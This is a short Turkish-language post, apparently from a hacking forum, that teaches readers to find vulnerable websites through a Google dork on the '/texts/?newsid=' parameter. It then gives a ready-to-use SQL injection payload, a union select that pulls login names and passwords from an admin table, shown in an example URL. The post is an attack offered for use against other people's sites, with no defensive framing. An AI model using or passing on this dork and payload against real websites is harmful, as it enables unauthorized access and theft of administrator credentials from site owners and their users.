Google DorK : Yani Googleda Aratacağınız Kod
"Bug : /texts/?newsid= SQL " Burda Google Arattığınız Kodların Site Sonlarında /texts/?newsid=1 vb Şeyler Görürseniz O Sitede Açık Olma Şansı Vardır Bug Bu Yüzden Vardır . Ordaki SQL Yazısı Sadece Verdiğimiz Exploit(SQL) Konudunun Oraya Gelecğini Gösterir !
Exploit
Exploiti Bilmeyen Yoktur Aramızda : ) SQL Yerine Gelecek Koddur Burda
Göstereceğim Acığın Exploiti Budur !
-1+union+select+1,2,concat_ws(0x3a,login,password), 4,5,6,7+from+b_admin--
Örnek Olarak Gösterirsek
siteadı.com/texts?newsid=-1+union+select+1,2,concat_ws(0x3a,login,password), 4,5,6,7+from+b_admin-- Bakın Texts?newsid=SQL Yerine Exploit Gelmiş Bu Bazı Açıklarda Kullanıcı Adı Ayrı Şifreyi Ayrı Vermesi İçin 2 Tane Exploit Vardır İkisindede Aynı Şeyi Yapıyoruz
sql injeksiyon örnek olarak verdim kolay gelsin .